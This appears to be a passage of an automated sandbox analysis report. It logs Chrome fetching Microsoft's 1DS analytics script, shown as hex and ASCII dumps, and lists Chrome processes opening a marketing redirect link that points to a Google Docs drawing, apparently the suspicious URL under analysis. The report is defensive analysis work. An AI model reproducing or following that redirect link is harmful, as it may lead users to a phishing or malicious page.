                                                                                        2024-12-18 01:11:15 UTC15492INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 20 53 44 4b 20 53 68 61 72 65 64 20 41 6e 61 6c 79 74 69 63 73 2c 20 33 2e 32 2e 31 38 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 74 2c 72 3d 7b 7d 2c 69 3d 22 5f 5f 6d 73 24 6d 6f 64 5f 5f 22 2c 6f 3d 7b 7d 2c 61 3d 6f 2e 65 73 6d 5f 6d 73 5f 73 68 61 72 65 64 5f 61 6e 61 6c 79 74 69 63 73 5f 6d 65 63 74 72 6c 5f 33 5f 32 5f 31 38 3d 7b 7d 2c 75 3d 22 33 2e 32 2e 31 38 22 2c 63 3d 22 6f 6e 65 44 73 4d 65 43
                                                                                        Data Ascii: /*! * 1DS JS SDK Shared Analytics, 3.2.18 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,n){var t,r={},i="__ms$mod__",o={},a=o.esm_ms_shared_analytics_mectrl_3_2_18={},u="3.2.18",c="oneDsMeC
                                                                                        2024-12-18 01:11:15 UTC16384INData Raw: 6f 7d 76 61 72 20 48 72 3d 22 74 6f 47 4d 54 53 74 72 69 6e 67 22 2c 6a 72 3d 22 74 6f 55 54 43 53 74 72 69 6e 67 22 2c 57 72 3d 22 63 6f 6f 6b 69 65 22 2c 58 72 3d 22 65 78 70 69 72 65 73 22 2c 47 72 3d 22 65 6e 61 62 6c 65 64 22 2c 51 72 3d 22 69 73 43 6f 6f 6b 69 65 55 73 65 44 69 73 61 62 6c 65 64 22 2c 4a 72 3d 22 64 69 73 61 62 6c 65 43 6f 6f 6b 69 65 73 55 73 61 67 65 22 2c 24 72 3d 22 5f 63 6b 4d 67 72 22 2c 5a 72 3d 6e 75 6c 6c 2c 59 72 3d 6e 75 6c 6c 2c 65 69 3d 6e 75 6c 6c 2c 6e 69 3d 24 74 28 29 2c 74 69 3d 7b 7d 2c 72 69 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 69 69 28 65 29 7b 72 65 74 75 72 6e 21 65 7c 7c 65 2e 69 73 45 6e 61 62 6c 65 64 28 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 69 28 65 2c 6e 29 7b 72 65 74 75 72 6e 20 6e 26 26 65 26 26 72 65
                                                                                        Data Ascii: o}var Hr="toGMTString",jr="toUTCString",Wr="cookie",Xr="expires",Gr="enabled",Qr="isCookieUseDisabled",Jr="disableCookiesUsage",$r="_ckMgr",Zr=null,Yr=null,ei=null,ni=$t(),ti={},ri={};function ii(e){return!e||e.isEnabled()}function oi(e,n){return n&&e&&re
                                                                                        2024-12-18 01:11:15 UTC16384INData Raw: 20 72 5b 6e 65 5d 7d 2c 70 2e 72 65 6c 65 61 73 65 51 75 65 75 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 67 26 26 30 3c 72 5b 6e 65 5d 26 26 28 65 3d 72 2c 72 3d 5b 5d 2c 69 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 79 28 29 5b 46 5d 28 65 29 7d 29 29 7d 2c 70 2e 70 6f 6c 6c 49 6e 74 65 72 6e 61 6c 4c 6f 67 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 50 3d 65 7c 7c 6e 75 6c 6c 2c 4e 3d 21 31 2c 41 26 26 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 41 29 2c 41 3d 6e 75 6c 6c 29 2c 68 28 21 30 29 7d 2c 70 5b 4b 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 4e 3d 21 30 2c 41 26 26 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 41 29 2c 41 3d 30 2c 66 28 29 29 7d 2c 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20
                                                                                        Data Ascii: r[ne]},p.releaseQueue=function(){var e;g&&0<r[ne]&&(e=r,r=[],ie(e,function(e){y()[F](e)}))},p.pollInternalLogs=function(e){return P=e||null,N=!1,A&&(clearInterval(A),A=null),h(!0)},p[Ke]=function(){N=!0,A&&(clearInterval(A),A=0,f())},t=function(){return
                                                                                        2024-12-18 01:11:15 UTC16384INData Raw: 72 3a 63 2e 41 4e 44 52 4f 49 44 2c 6f 73 3a 22 41 6e 64 72 6f 69 64 22 7d 2c 7b 72 3a 63 2e 4c 49 4e 55 58 2c 6f 73 3a 22 4c 69 6e 75 78 22 7d 2c 7b 72 3a 63 2e 43 52 4f 53 2c 6f 73 3a 22 43 68 72 6f 6d 65 20 4f 53 22 7d 2c 7b 73 3a 22 78 31 31 22 2c 6f 73 3a 22 55 6e 69 78 22 7d 2c 7b 73 3a 22 62 6c 61 63 6b 62 65 72 72 79 22 2c 6f 73 3a 22 42 6c 61 63 6b 42 65 72 72 79 22 7d 2c 7b 73 3a 22 73 79 6d 62 69 61 6e 22 2c 6f 73 3a 22 53 79 6d 62 69 61 6e 22 7d 2c 7b 73 3a 22 6e 6f 6b 69 61 22 2c 6f 73 3a 22 4e 6f 6b 69 61 22 7d 2c 7b 72 3a 63 2e 4f 53 58 2c 6f 73 3a 22 4d 61 63 20 4f 53 20 58 22 7d 5d 3b 66 75 6e 63 74 69 6f 6e 20 7a 61 28 65 2c 6e 29 7b 6e 3d 65 2e 6d 61 74 63 68 28 52 65 67 45 78 70 28 6e 2b 22 20 22 2b 4c 61 29 29 3b 72 65 74 75 72 6e 20
                                                                                        Data Ascii: r:c.ANDROID,os:"Android"},{r:c.LINUX,os:"Linux"},{r:c.CROS,os:"Chrome OS"},{s:"x11",os:"Unix"},{s:"blackberry",os:"BlackBerry"},{s:"symbian",os:"Symbian"},{s:"nokia",os:"Nokia"},{r:c.OSX,os:"Mac OS X"}];function za(e,n){n=e.match(RegExp(n+" "+La));return
                                                                                        2024-12-18 01:11:15 UTC16384INData Raw: 61 72 20 6f 3d 6f 26 26 6f 2e 73 6c 69 63 65 28 29 2c 73 3d 30 3b 73 3c 63 2d 31 3b 73 2b 2b 29 7b 76 61 72 20 6c 3d 75 5b 73 5d 2c 61 3d 61 5b 6c 5d 3d 61 5b 6c 5d 7c 7c 7b 7d 3b 72 2b 3d 22 2e 22 2b 6c 2c 6f 26 26 6f 2e 70 75 73 68 28 6c 29 7d 69 3d 75 5b 63 2d 31 5d 7d 7d 28 65 3d 76 26 26 28 28 74 3d 53 5b 65 3d 72 5d 29 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 28 37 3c 3d 65 2e 6c 65 6e 67 74 68 26 26 28 74 3d 61 74 28 65 2c 22 65 78 74 2e 6d 65 74 61 64 61 74 61 22 29 7c 7c 61 74 28 65 2c 22 65 78 74 2e 77 65 62 22 29 29 2c 53 5b 65 5d 3d 74 29 2c 74 29 7c 7c 21 62 7c 7c 21 62 2e 68 61 6e 64 6c 65 46 69 65 6c 64 28 72 2c 69 29 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 66 28 21 65 26 26 21 58 6f 28 65 29 7c 7c 22 73 74 72 69 6e 67 22 21 3d 74
                                                                                        Data Ascii: ar o=o&&o.slice(),s=0;s<c-1;s++){var l=u[s],a=a[l]=a[l]||{};r+="."+l,o&&o.push(l)}i=u[c-1]}}(e=v&&((t=S[e=r])===undefined&&(7<=e.length&&(t=at(e,"ext.metadata")||at(e,"ext.web")),S[e]=t),t)||!b||!b.handleField(r,i)?function(e,n){if(!e&&!Xo(e)||"string"!=t
                                                                                        2024-12-18 01:11:15 UTC10774INData Raw: 51 3f 4d 61 74 68 2e 6d 69 6e 28 51 2c 72 29 3a 72 2c 6b 3d 4d 61 74 68 2e 6d 61 78 28 6b 2c 6e 29 29 2c 69 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 71 3d 7b 52 45 41 4c 5f 54 49 4d 45 3a 5b 32 2c 31 2c 30 5d 2c 4e 45 41 52 5f 52 45 41 4c 5f 54 49 4d 45 3a 5b 36 2c 33 2c 30 5d 2c 42 45 53 54 5f 45 46 46 4f 52 54 3a 5b 31 38 2c 39 2c 30 5d 7d 7d 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 6e 29 7b 76 61 72 20 74 3d 5b 5d 2c 72 3d 24 3f 59 3a 5a 3b 69 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 30 3c 65 2e 63 6f 75 6e 74 28 29 26 26 69 65 28 65 2e 65 76 65 6e 74 73 28 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 28 65 2e 73 79 6e 63 26 26 28 65 2e 6c 61 74 65 6e 63 79 3d 34 2c 65 2e 73 79 6e 63 3d 21 31 29 2c 65 2e 73 65 6e 64 41 74 74 65 6d
                                                                                        Data Ascii: Q?Math.min(Q,r):r,k=Math.max(k,n)),i}function n(){q={REAL_TIME:[2,1,0],NEAR_REAL_TIME:[6,3,0],BEST_EFFORT:[18,9,0]}}function e(e,n){var t=[],r=$?Y:Z;ie(e,function(e){e&&0<e.count()&&ie(e.events(),function(e){e&&(e.sync&&(e.latency=4,e.sync=!1),e.sendAttem


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        34192.168.2.164979413.107.246.634436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:11:17 UTC393OUTGET /scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js HTTP/1.1
                                                                                        Host: js.monitor.azure.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:11:17 UTC920INHTTP/1.1 200 OK
                                                                                        Date: Wed, 18 Dec 2024 01:11:17 GMT
                                                                                        Content-Type: text/javascript; charset=utf-8
                                                                                        Content-Length: 91802
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                        Last-Modified: Mon, 01 Jul 2024 17:02:58 GMT
                                                                                        ETag: 0x8DC99EFA85DE069
                                                                                        x-ms-request-id: fbe37448-a01e-0068-58b9-4b460a000000
                                                                                        x-ms-version: 2009-09-19
                                                                                        x-ms-meta-jssdkver: 3.2.18
                                                                                        x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.shared.analytics.mectrl-3.2.18.gbl.min.js
                                                                                        Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                        Access-Control-Allow-Origin: *
                                                                                        x-azure-ref: 20241218T011117Z-156796c549bv22hghC1EWR07k00000000cs0000000009pw5
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache-Info: L2_T2
                                                                                        X-Cache: TCP_REMOTE_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-18 01:11:17 UTC15464INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 20 53 44 4b 20 53 68 61 72 65 64 20 41 6e 61 6c 79 74 69 63 73 2c 20 33 2e 32 2e 31 38 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 74 2c 72 3d 7b 7d 2c 69 3d 22 5f 5f 6d 73 24 6d 6f 64 5f 5f 22 2c 6f 3d 7b 7d 2c 61 3d 6f 2e 65 73 6d 5f 6d 73 5f 73 68 61 72 65 64 5f 61 6e 61 6c 79 74 69 63 73 5f 6d 65 63 74 72 6c 5f 33 5f 32 5f 31 38 3d 7b 7d 2c 75 3d 22 33 2e 32 2e 31 38 22 2c 63 3d 22 6f 6e 65 44 73 4d 65 43
                                                                                        Data Ascii: /*! * 1DS JS SDK Shared Analytics, 3.2.18 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,n){var t,r={},i="__ms$mod__",o={},a=o.esm_ms_shared_analytics_mectrl_3_2_18={},u="3.2.18",c="oneDsMeC
                                                                                        2024-12-18 01:11:18 UTC16384INData Raw: 74 65 20 65 5b 6e 5d 7d 63 61 74 63 68 28 74 29 7b 7d 7d 7d 3b 72 65 74 75 72 6e 20 6f 7d 76 61 72 20 48 72 3d 22 74 6f 47 4d 54 53 74 72 69 6e 67 22 2c 6a 72 3d 22 74 6f 55 54 43 53 74 72 69 6e 67 22 2c 57 72 3d 22 63 6f 6f 6b 69 65 22 2c 58 72 3d 22 65 78 70 69 72 65 73 22 2c 47 72 3d 22 65 6e 61 62 6c 65 64 22 2c 51 72 3d 22 69 73 43 6f 6f 6b 69 65 55 73 65 44 69 73 61 62 6c 65 64 22 2c 4a 72 3d 22 64 69 73 61 62 6c 65 43 6f 6f 6b 69 65 73 55 73 61 67 65 22 2c 24 72 3d 22 5f 63 6b 4d 67 72 22 2c 5a 72 3d 6e 75 6c 6c 2c 59 72 3d 6e 75 6c 6c 2c 65 69 3d 6e 75 6c 6c 2c 6e 69 3d 24 74 28 29 2c 74 69 3d 7b 7d 2c 72 69 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 69 69 28 65 29 7b 72 65 74 75 72 6e 21 65 7c 7c 65 2e 69 73 45 6e 61 62 6c 65 64 28 29 7d 66 75 6e 63
                                                                                        Data Ascii: te e[n]}catch(t){}}};return o}var Hr="toGMTString",jr="toUTCString",Wr="cookie",Xr="expires",Gr="enabled",Qr="isCookieUseDisabled",Jr="disableCookiesUsage",$r="_ckMgr",Zr=null,Yr=null,ei=null,ni=$t(),ti={},ri={};function ii(e){return!e||e.isEnabled()}func
                                                                                        2024-12-18 01:11:18 UTC16384INData Raw: 70 2e 65 76 65 6e 74 43 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 5b 6e 65 5d 7d 2c 70 2e 72 65 6c 65 61 73 65 51 75 65 75 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 67 26 26 30 3c 72 5b 6e 65 5d 26 26 28 65 3d 72 2c 72 3d 5b 5d 2c 69 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 79 28 29 5b 46 5d 28 65 29 7d 29 29 7d 2c 70 2e 70 6f 6c 6c 49 6e 74 65 72 6e 61 6c 4c 6f 67 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 50 3d 65 7c 7c 6e 75 6c 6c 2c 4e 3d 21 31 2c 41 26 26 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 41 29 2c 41 3d 6e 75 6c 6c 29 2c 68 28 21 30 29 7d 2c 70 5b 4b 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 4e 3d 21 30 2c 41 26 26 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 41 29 2c 41 3d
                                                                                        Data Ascii: p.eventCnt=function(){return r[ne]},p.releaseQueue=function(){var e;g&&0<r[ne]&&(e=r,r=[],ie(e,function(e){y()[F](e)}))},p.pollInternalLogs=function(e){return P=e||null,N=!1,A&&(clearInterval(A),A=null),h(!0)},p[Ke]=function(){N=!0,A&&(clearInterval(A),A=
                                                                                        2024-12-18 01:11:18 UTC16384INData Raw: 6e 64 6f 77 73 22 7d 2c 7b 72 3a 63 2e 49 4f 53 2c 6f 73 3a 22 69 4f 53 22 7d 2c 7b 72 3a 63 2e 41 4e 44 52 4f 49 44 2c 6f 73 3a 22 41 6e 64 72 6f 69 64 22 7d 2c 7b 72 3a 63 2e 4c 49 4e 55 58 2c 6f 73 3a 22 4c 69 6e 75 78 22 7d 2c 7b 72 3a 63 2e 43 52 4f 53 2c 6f 73 3a 22 43 68 72 6f 6d 65 20 4f 53 22 7d 2c 7b 73 3a 22 78 31 31 22 2c 6f 73 3a 22 55 6e 69 78 22 7d 2c 7b 73 3a 22 62 6c 61 63 6b 62 65 72 72 79 22 2c 6f 73 3a 22 42 6c 61 63 6b 42 65 72 72 79 22 7d 2c 7b 73 3a 22 73 79 6d 62 69 61 6e 22 2c 6f 73 3a 22 53 79 6d 62 69 61 6e 22 7d 2c 7b 73 3a 22 6e 6f 6b 69 61 22 2c 6f 73 3a 22 4e 6f 6b 69 61 22 7d 2c 7b 72 3a 63 2e 4f 53 58 2c 6f 73 3a 22 4d 61 63 20 4f 53 20 58 22 7d 5d 3b 66 75 6e 63 74 69 6f 6e 20 7a 61 28 65 2c 6e 29 7b 6e 3d 65 2e 6d 61 74
                                                                                        Data Ascii: ndows"},{r:c.IOS,os:"iOS"},{r:c.ANDROID,os:"Android"},{r:c.LINUX,os:"Linux"},{r:c.CROS,os:"Chrome OS"},{s:"x11",os:"Unix"},{s:"blackberry",os:"BlackBerry"},{s:"symbian",os:"Symbian"},{s:"nokia",os:"Nokia"},{r:c.OSX,os:"Mac OS X"}];function za(e,n){n=e.mat
                                                                                        2024-12-18 01:11:18 UTC16384INData Raw: 2e 22 29 2c 63 3d 75 2e 6c 65 6e 67 74 68 3b 69 66 28 31 3c 63 29 7b 66 6f 72 28 76 61 72 20 6f 3d 6f 26 26 6f 2e 73 6c 69 63 65 28 29 2c 73 3d 30 3b 73 3c 63 2d 31 3b 73 2b 2b 29 7b 76 61 72 20 6c 3d 75 5b 73 5d 2c 61 3d 61 5b 6c 5d 3d 61 5b 6c 5d 7c 7c 7b 7d 3b 72 2b 3d 22 2e 22 2b 6c 2c 6f 26 26 6f 2e 70 75 73 68 28 6c 29 7d 69 3d 75 5b 63 2d 31 5d 7d 7d 28 65 3d 76 26 26 28 28 74 3d 53 5b 65 3d 72 5d 29 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 28 37 3c 3d 65 2e 6c 65 6e 67 74 68 26 26 28 74 3d 61 74 28 65 2c 22 65 78 74 2e 6d 65 74 61 64 61 74 61 22 29 7c 7c 61 74 28 65 2c 22 65 78 74 2e 77 65 62 22 29 29 2c 53 5b 65 5d 3d 74 29 2c 74 29 7c 7c 21 62 7c 7c 21 62 2e 68 61 6e 64 6c 65 46 69 65 6c 64 28 72 2c 69 29 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 6e
                                                                                        Data Ascii: ."),c=u.length;if(1<c){for(var o=o&&o.slice(),s=0;s<c-1;s++){var l=u[s],a=a[l]=a[l]||{};r+="."+l,o&&o.push(l)}i=u[c-1]}}(e=v&&((t=S[e=r])===undefined&&(7<=e.length&&(t=at(e,"ext.metadata")||at(e,"ext.web")),S[e]=t),t)||!b||!b.handleField(r,i)?function(e,n
                                                                                        2024-12-18 01:11:18 UTC10802INData Raw: 3a 65 2c 73 65 6e 64 52 65 61 73 6f 6e 3a 6e 7d 7d 2c 21 74 29 3a 28 51 3d 30 3c 3d 51 3f 4d 61 74 68 2e 6d 69 6e 28 51 2c 72 29 3a 72 2c 6b 3d 4d 61 74 68 2e 6d 61 78 28 6b 2c 6e 29 29 2c 69 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 71 3d 7b 52 45 41 4c 5f 54 49 4d 45 3a 5b 32 2c 31 2c 30 5d 2c 4e 45 41 52 5f 52 45 41 4c 5f 54 49 4d 45 3a 5b 36 2c 33 2c 30 5d 2c 42 45 53 54 5f 45 46 46 4f 52 54 3a 5b 31 38 2c 39 2c 30 5d 7d 7d 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 6e 29 7b 76 61 72 20 74 3d 5b 5d 2c 72 3d 24 3f 59 3a 5a 3b 69 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 30 3c 65 2e 63 6f 75 6e 74 28 29 26 26 69 65 28 65 2e 65 76 65 6e 74 73 28 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 28 65 2e 73 79 6e 63 26 26 28 65 2e 6c 61 74 65
                                                                                        Data Ascii: :e,sendReason:n}},!t):(Q=0<=Q?Math.min(Q,r):r,k=Math.max(k,n)),i}function n(){q={REAL_TIME:[2,1,0],NEAR_REAL_TIME:[6,3,0],BEST_EFFORT:[18,9,0]}}function e(e,n){var t=[],r=$?Y:Z;ie(e,function(e){e&&0<e.count()&&ie(e.events(),function(e){e&&(e.sync&&(e.late


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:20:09:52
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                        Imagebase:0x7ff7f9810000
                                                                                        File size:3'242'272 bytes
                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        Target ID:1
                                                                                        Start time:20:09:52
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1972,i,10070688419523439903,9066158452006495313,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                        Imagebase:0x7ff7f9810000
                                                                                        File size:3'242'272 bytes
                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        Target ID:3
                                                                                        Start time:20:09:53
                                                                                        Start date:17/12/2024
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://recp.mkt81.net/ctt?m=9201264&r=MjcwMzc5ODk4MTM3S0&b=0&j=MTY4MDU5NzgyOAS2&k=Language&kx=1&kt=12&kd=//docs.google.com/drawings/d/1GBvP8EGp9_63LeC_UMSYm_dkcuk4Q6yrMmrOzMDg_wk/preview?pli=1"
                                                                                        Imagebase:0x7ff7f9810000
                                                                                        File size:3'242'272 bytes
                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        No disassembly